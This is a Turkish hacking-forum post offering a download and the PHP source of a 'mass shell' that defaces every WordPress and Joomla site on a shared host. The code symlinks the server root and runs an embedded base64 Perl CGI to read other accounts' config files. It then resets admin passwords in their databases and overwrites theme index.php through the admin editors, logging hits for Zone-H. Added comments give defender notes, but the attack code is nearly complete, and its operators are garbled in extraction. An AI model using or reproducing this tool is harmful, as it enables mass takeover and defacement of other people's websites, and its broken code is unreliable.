Konu: Joomla - Wp Mass Shell
Stallk3r
Yorum: #1
Joomla - Wp Mass Shell
17.08.2014 20:07
Evet arkadaşlar bildiğimiz gibi genellikle herkes star.php olan sadece wordpress sitelere index atan shellimizi kullanıyoruz ama bu shell hem joomlu sitelere hemde wordpress sitelere index atıyor mass shellimiz arkadaşlar star.php %55 falan index yeme şansı olurken diğer sitelerin bunda %100 hepsi index yiyor ilk defa Burda

İNDİRME LİNKİ :http://www.dosya.tc/server34/ZUy5Rn/jowp.rar.html

İNDİRME LİNKİMİZ BUDUR ARKADAŞLAR CONFİG ÇEKTİKTEN SONRA YAPABİLİRSİN.

PHP Kod:
<?php
// Turns off all PHP error reporting for this request.
error_reporting
(0);
/*
 * entre2v2 - text-extraction helper: returns the trimmed text that sits
 * between a start marker and an end marker inside $text.
 *
 * $text               string to search
 * $marqueurDebutLien  start marker ($text is split on it)
 * $marqueurFinLien    end marker (the selected piece is split on it)
 * $i                  which piece after splitting on the start marker to use
 *                     (default 1, i.e. the text after the first occurrence)
 *
 * NOTE(review): this listing appears to have lost some operators and
 * separators when the forum page was extracted, so it is not valid PHP as
 * shown; the comments describe what the visible tokens indicate.
 */
function 
entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    
$ar0=explode($marqueurDebutLien$text);
    
$ar1=explode($marqueurFinLien$ar0[$i]);
    return 
trim($ar1[0]);
}

/*
 * randomt - builds a short pseudo-random string (the loop runs while $i <= 7)
 * out of lowercase letters and digits taken from $chars.
 *
 * The generator is rand(), seeded from microtime(); that is predictable and
 * not suitable for anything security-sensitive. Elsewhere in this listing the
 * result is used as a temporary cookie-jar file name.
 *
 * NOTE(review): the listing appears to have lost assignment operators and
 * argument separators in extraction; comments describe the evident intent.
 */
function 
randomt() {
    
$chars "abcdefghijkmnopqrstuvwxyz023456789";
    
$srand((double)microtime()*1000000);
    
$i 0;
    
$pass '';
    while (
$i <= 7) {
        
$num rand() % 33;
        
$tmp substr($chars$num1);
        
$pass $pass $tmp;
        
$i++;
    }
    return 
$pass;
}

/*
 * index_changer_wp - WordPress half of the defacement routine.
 *
 * $conf     text of a wp-config.php file
 * $content  base64-encoded replacement body (it is base64_decode()d before
 *           being posted to the theme editor)
 * Returns   array('cond' => ..., 'output' => ...) where 'output' is an HTML
 *           status log and 'cond' is set to 1 on the reported-success paths.
 *
 * What the visible code does, in order:
 *   1. pulls DB_USER, DB_PASSWORD, DB_NAME, DB_HOST and the table prefix out
 *      of the config text with entre2v2();
 *   2. connects with the legacy mysql_* API and overwrites the row with ID 1
 *      in the users table (login name and a fixed password hash);
 *   3. reads the 'home', 'template' and 'current_theme' options;
 *   4. logs in through wp-login.php with cURL and rewrites the active theme's
 *      index.php through wp-admin/theme-editor.php;
 *   5. removes its cookie jar file.
 *
 * Defender notes:
 *   - The whole chain depends on another account's wp-config.php being
 *     readable. Tight file permissions on wp-config.php and per-account
 *     isolation on shared hosts remove the starting point.
 *   - define('DISALLOW_FILE_EDIT', true) in wp-config.php disables the theme
 *     editor that step 4 relies on.
 *   - Indicators visible in this function: the fixed user_pass value written
 *     for ID 1, the hard-coded User-Agent string, a wp-login.php POST followed
 *     directly by theme-editor.php requests, and a COOKIE.txt file in the
 *     script's working directory.
 *
 * NOTE(review): the listing appears to have lost operators and separators in
 * extraction and is not valid PHP as shown.
 */
function 
index_changer_wp($conf$content) {
    
$output '';
    
$dol '$';
    
$go 0;
    
$username entre2v2($conf,"define('DB_USER', '","');");
    
$password entre2v2($conf,"define('DB_PASSWORD', '","');");
    
$dbname entre2v2($conf,"define('DB_NAME', '","');");
    
$prefix entre2v2($conf,$dol."table_prefix  = '","'");
    
$host entre2v2($conf,"define('DB_HOST', '","');");

    
$link=mysql_connect($host,$username,$password);
    if(
$link) {
        
mysql_select_db($dbname,$link) ;
        
$dol '$';
        
        // Account takeover step: user ID 1 gets a fixed login name and hash.
        // The hash literal is a useful search string when auditing a users table.
$req1 mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
    } else {
        
$output.= "[-] DB Error<br />";
    }
    if(
$req1) {

        
$req mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
        
$data mysql_fetch_array($req);
        
$site_url=$data["option_value"]; 

        
$req mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");
        
$data mysql_fetch_array($req);
        
$template $data["option_value"];

        
$req mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");
        
$data mysql_fetch_array($req);
        
$current_theme $data["option_value"];

        
        // Hard-coded User-Agent sent with every request below (log-search indicator).
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
        
$url2=$site_url."/wp-login.php";

        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url2);
        
curl_setopt($chCURLOPT_POST1);
        
curl_setopt($chCURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
        
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
        
curl_setopt($chCURLOPT_RETURNTRANSFER,1);
        
curl_setopt($chCURLOPT_HEADER0);
        
curl_setopt($chCURLOPT_CONNECTTIMEOUT10);
        
curl_setopt($chCURLOPT_USERAGENT$useragent);
        
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
        
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
        
$buffer curl_exec($ch);

        
        // Login is treated as successful when the response contains a logout link.
$pos strpos($buffer,"action=logout");
        if(
$pos === false) {
$output.= "[-] Login Error<br />";
        } else {
$output.= "[+] Login Successful<br />";
$go 1;
        }
        if(
$go) {
$cond 0;
// First attempt: theme-editor URL form that takes file, theme and dir parameters.
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION0);
curl_setopt($chCURLOPT_RETURNTRANSFER,1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
$buffer0 curl_exec($ch);

// The nonce and file name are scraped from the editor form's hidden inputs.
$_wpnonce entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(
substr_count($_file,"/index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
$buffer curl_exec($ch);
curl_close($ch);

$pos strpos($buffer,'<div id="message" class="updated">');
if(
$pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Updated Successfuly<br />";
$hk explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond 1;
}
} else {
// Second attempt: theme-editor URL form that takes a bare file name and theme.
$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION0);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
$buffer0 curl_exec($ch);

$_wpnonce entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
$_file entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');

if(
substr_count($_file,"index.php") != 0){
$output.= "[+] index.php loaded in Theme Editor<br />";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR"COOKIE.txt");
curl_setopt($chCURLOPT_COOKIEFILE"COOKIE.txt");
$buffer curl_exec($ch);
curl_close($ch);

$pos strpos($buffer,'<div id="message" class="updated">');
if(
$pos === false) {
    
$output.= "[-] Updating Index.php Error<br />";
} else {
    
$output.= "[+] Index.php Template Updated Successfuly<br />";
    
$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
    
$cond 1;
}
} else {
$output.= "[-] index.php can not load in Theme Editor<br />";
}
}
        }
    } else {
        
$output.= "[-] DB Error<br />";
    }
    // Cleanup: the cookie jar is deleted, so it may not be present after the run.
    global 
$base_path;
    
unlink($base_path.'COOKIE.txt');
    return array(
'cond'=>$cond'output'=>$output);
}

/*
 * index_changer_joomla - Joomla half of the defacement routine.
 *
 * $conf     text of a Joomla configuration.php file
 * $content  replacement template body, posted as given
 * $domain   host name used to build http://<domain>/administrator
 * Returns   array('cond' => ..., 'output' => ...) where 'output' is an HTML
 *           status log and 'cond' is set to 1 on the reported-success paths.
 *
 * What the visible code does, in order:
 *   1. pulls user, password, db, dbprefix and host out of the config text;
 *   2. connects with the legacy mysql_* API and rewrites the users table.
 *      The UPDATE has no WHERE clause, so every account row is overwritten,
 *      not just one administrator; recovery therefore needs the users table
 *      restored from backup, not a single password reset;
 *   3. checks for an `extensions` table to choose between two code paths
 *      (template_styles/extensions schema vs. templates_menu schema);
 *   4. logs in to /administrator with cURL and saves a new index.php for the
 *      active template through com_templates;
 *   5. removes its randomly named cookie jar file.
 *
 * Defender notes:
 *   - The starting point is a readable configuration.php belonging to another
 *     account; restrictive permissions and per-account isolation block it.
 *   - Indicators visible here: the fixed password hash literal, every user
 *     row sharing one username/hash, and administrator logins followed by
 *     com_templates source-save requests from the server's own address.
 *
 * NOTE(review): the listing appears to have lost operators and separators in
 * extraction and is not valid PHP as shown.
 */
function 
index_changer_joomla($conf$content$domain) {
    
$doler '$';
    
$username entre2v2($conf$doler."user = '""';");
    
$password entre2v2($conf$doler."password = '""';");
    
$dbname entre2v2($conf$doler."db = '""';");
    
$prefix entre2v2($conf$doler."dbprefix = '""';");
    
$host entre2v2($conf$doler."host = '","';");
    
$co=randomt();
    
$site_url "http://".$domain."/administrator";
    
$output '';
    
$cond 0
    
$link=mysql_connect($host$username$password);
    if(
$link) {
        
mysql_select_db($dbname,$link) ;
        
        // No WHERE clause: this statement touches every row of the users table.
$req1 mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
        
        // Presence of an `extensions` table selects the first branch below.
$req mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
    } else {
        
$output.= "[-] DB Error<br />";
    }
    
    if(
$req1){
        if (
$req) {
$req mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data mysql_fetch_array($req);
$template_name $data["template"];

$req mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data mysql_fetch_array($req);
$template_id $data["extension_id"];

$url2=$site_url."/index.php";
$ch curl_init();
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
// Hidden form fields (return value and token name) are scraped from the login page.
$return entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

if(
$return && $hidden) {
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_REFERER$url2);
curl_setopt($chCURLOPT_POSTFIELDS"username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
// Login is treated as successful when the response mentions com_config.
$pos strpos($buffer,"com_config");
if(
$pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}
if(
$pos){
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch curl_init();
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if(
$hidden2) {
$output.= "[+] index.php file found in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}
if(
$hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch curl_init();
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
curl_close($ch);

$pos strpos($buffer,'<dd class="message message">');
$cond 0;
if(
$pos === false) {
$output.= "[-] Updating Index.php Error<br />";
   
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond 1;
}
}
        } 
        else {
// Branch taken when no `extensions` table exists: uses templates_menu instead.
$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
$data mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch curl_init();
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_CONNECTTIMEOUT10);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

if(
$hidden) {
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
$pos strpos($buffer,"com_config");
if(
$pos === false) {
$output.= "[-] Login Error<br />";
} else {
$output.= "[+] Login Successful<br />";
}
}

if(
$pos) {
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
if(
$hidden2) {
$output.= "[+] index.php file founded in Theme Editor<br />";
} else {
$output.= "[-] index.php Not found in Theme Editor<br />";
}
}

if(
$hidden2) {
$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($chCURLOPT_URL$url2);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($chCURLOPT_HEADER0);
curl_setopt($chCURLOPT_USERAGENT$useragent);
curl_setopt($chCURLOPT_COOKIEJAR$co); 
curl_setopt($chCURLOPT_COOKIEFILE$co); 
$buffer curl_exec($ch);
curl_close($ch);

$pos strpos($buffer,'<dd class="message message fade">');
$cond 0;
if(
$pos === false) {
$output.= "[-] Updating Index.php Error<br />";
} else {
$output.= "[+] Index.php Template successfully saved<br />";
$cond 1;
}
}
        }
    } else {
        
$output.= "[-] DB Error<br />";
    }
    // Cleanup: the randomly named cookie jar is deleted before returning.
    global 
$base_path;
    
unlink($base_path.$co);
    return array(
'cond'=>$cond'output'=>$output); 
}

/*
 * exec_mode_1 - driver for the "/etc/named.conf" mode of the tool.
 *
 * $def_url  URL whose contents are fetched and url-encoded as the
 *           replacement page
 * $hacker   accepted but not referenced anywhere in the visible body
 *
 * What the visible code does:
 *   - creates a world-writable `sym` directory next to the script, writes a
 *     .htaccess into it and symlinks the filesystem root to `sym/root`;
 *   - the .htaccess declares .php as text/plain, presumably so that files
 *     reached through the symlink are returned as source text;
 *   - lists zone names from /etc/named.conf and maps each domain to an
 *     account through the owner of /etc/valiases/<domain>;
 *   - fetches configuration.php, wp-config.php and blog/wp-config.php from
 *     each account's public_html through the web server and the symlink;
 *   - hands each config to index_changer_joomla() / index_changer_wp(),
 *     prints an HTML result table and appends hits to defaced.html.
 *
 * Defender notes (shared hosting):
 *   - This is a cross-account symlink read. It stops working when Apache
 *     only follows links whose owner matches (Options SymLinksIfOwnerMatch),
 *     when AllowOverride does not let users set Options/handlers in
 *     .htaccess, when PHP is confined with open_basedir and symlink() is in
 *     disable_functions, and when config files are not readable by the web
 *     server user on behalf of other accounts.
 *   - Indicators visible here: a `sym/` directory containing `root -> /`,
 *     a .htaccess with "DirectoryIndex Sux.html", a `defaced.html` log, and
 *     web requests for .../sym/root/home/<user>/public_html/*config*.php.
 *
 * NOTE(review): the listing appears to have lost operators and separators in
 * extraction and is not valid PHP as shown.
 */
function 
exec_mode_1($def_url$hacker) {

    @
mkdir('sym',0777);
    
$wr  "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    
$fp = @fopen ('sym/.htaccess','w');
    
fwrite($fp$wr);
    @
symlink('/','sym/root');
    
$dominios = @file_get_contents("/etc/named.conf");
    @
preg_match_all('/.*?zone "(.*?)" {/'$dominios$out);
    
$out[1] = array_unique($out[1]);
    
$numero_dominios count($out[1]);
    echo 
"Total domains: $numero_dominios <br><br />";
    
$def file_get_contents($def_url);
    
$def urlencode($def);
    
    // Embedded base64 blob; it starts with the encoding of a PHP open tag and is
    // passed as $content to index_changer_wp() below. Contents not analysed here.
$dd 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5uZXQvZGV​mYWNlZC8yMDEzLzAxLzEzL2JhbHRzdHVkaW8ubHQvaW5kZXguaHRtbCcpOw0KJHAgPSBleHBsb2RlKCd​wdWJsaWNfaHRtbCcsZGlybmFtZShfX0ZJTEVfXykpOw0KJHAgPSAkcFswXS4ncHVibGljX2h0bWwnOw0​KaWYgKCRoYW5kbGUgPSBvcGVuZGlyKCRwKSkgew0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5​odG1sJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHA​uJy9pbmRleC5waHAnLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgJGZwMSA9IEB​mb3BlbigkcC4nL2luZGV4Lmh0bScsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICB​lY2hvICdEb25lJzsNCn0NCmNsb3NlZGlyKCRoYW5kbGUpOw0KdW5saW5rKF9fRklMRV9fKTsNCj8+';
    
$base_url 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
    
$output fopen('defaced.html''a+');
    
$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :) : 0;
    
$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :) : 0;
    echo 
'<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    
$j 1;
    
$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
    for(
$i $st$i <= $numero_dominios$i++)
    {
        
$domain $out[1][$i];
        
        // The owner of /etc/valiases/<domain> is used to find the hosting account name.
$dono_arquivo = @fileowner("/etc/valiases/".$domain);
        
$infos = @posix_getpwuid($dono_arquivo);
        
        if(
$infos['name']!='root') {
// Config files are read over HTTP through the sym/root link, not from disk directly.
$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");

$cls = ($j == 0) ? 'class="even"' 'class="odd"';
        
if(
$config01 && preg_match('/dbprefix/i',$config01)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="pink">JOOMLA</font></td>';
$res index_changer_joomla($config01$def$domain);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
}

if(
$config02 && preg_match('/DB_NAME/i',$config02)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res index_changer_wp($config02$dd);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
}
$cls = ($j == 0) ? 'class="even"' 'class="odd"';
if(
$config03 && preg_match('/DB_NAME/i',$config03)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res index_changer_wp($config03$dd);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {    
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
}
        }
    }
    echo 
'</table>';
    echo 
'<hr/>';
    echo 
'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';
    echo 
'<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if(
$_SESSION['count1']+$_SESSION['count2'] > 0){
        echo 
'<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
/*
 * exec_mode_2 - driver for the "/etc/passwd" mode of the tool.
 *
 * $def_url  URL whose contents are fetched and url-encoded as the
 *           replacement page
 *
 * What the visible code does:
 *   - lists zone names from /etc/named.conf and builds an account-name to
 *     domain map from the owner of /etc/valiases/<domain>;
 *   - creates a world-writable `plsym` directory, writes a decoded script to
 *     plsym/plsym.cc, marks it executable and writes a .htaccess that maps
 *     the .cc extension to the CGI handler;
 *   - requests plsym.cc over HTTP so the web server runs it, deletes it, then
 *     scrapes the directory listing of plsym/ for entries named
 *     <account>##joomla.txt and <account>##wordpress.txt;
 *   - reads those entries as config text, calls index_changer_joomla() /
 *     index_changer_wp(), prints an HTML result table and appends hits to
 *     defaced.html.
 *
 * Defender notes (shared hosting):
 *   - The technique needs user-controlled .htaccess to enable ExecCGI,
 *     FollowSymLinks and Indexes. Restricting AllowOverride, enforcing
 *     Options SymLinksIfOwnerMatch and keeping other accounts' config files
 *     unreadable break it.
 *   - Indicators visible here: a `plsym/` directory, a short-lived
 *     `plsym.cc`, a .htaccess containing "AddHandler cgi-script .cc", entries
 *     whose names contain "##joomla.txt" / "##wordpress.txt", and a
 *     `defaced.html` log.
 *
 * NOTE(review): the listing appears to have lost operators and separators in
 * extraction and is not valid PHP as shown.
 */
function 
exec_mode_2($def_url) {
    
    
$domains = @file_get_contents("/etc/named.conf");
    @
preg_match_all('/.*?zone "(.*?)" {/'$domains$out);
    
$out array_unique($out[1]);
    
$num count($out);
    print(
"Total domains: $num<br><br />");
    
    
$def file_get_contents($def_url);
    
$def urlencode($def);
       
    
$output fopen('defaced.html''a+');
    
$defaced '';
    
$count1 0;
    
$count2 0;
    echo 
'<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    
$j 1;
    
$map = array();
    foreach(
$out as $d) {
        
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        
$map[$info['name']] = $d;
    }
    
    // Embedded base64 blob; it starts with the encoding of a Perl shebang line and
    // is written to plsym/plsym.cc below. Contents not analysed here.
$dt 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcik​gPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
           NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW​1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
           h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltb​GluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
           G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5r​KCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
           YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2N​hbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
           kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQ​pmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
           B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ=='
;
    
mkdir('plsym',0777);
    
file_put_contents('plsym/plsym.cc'base64_decode($dt));
    
chmod('plsym/plsym.cc'0755);
    
    // .htaccess turns on CGI execution for the .cc extension inside plsym/.
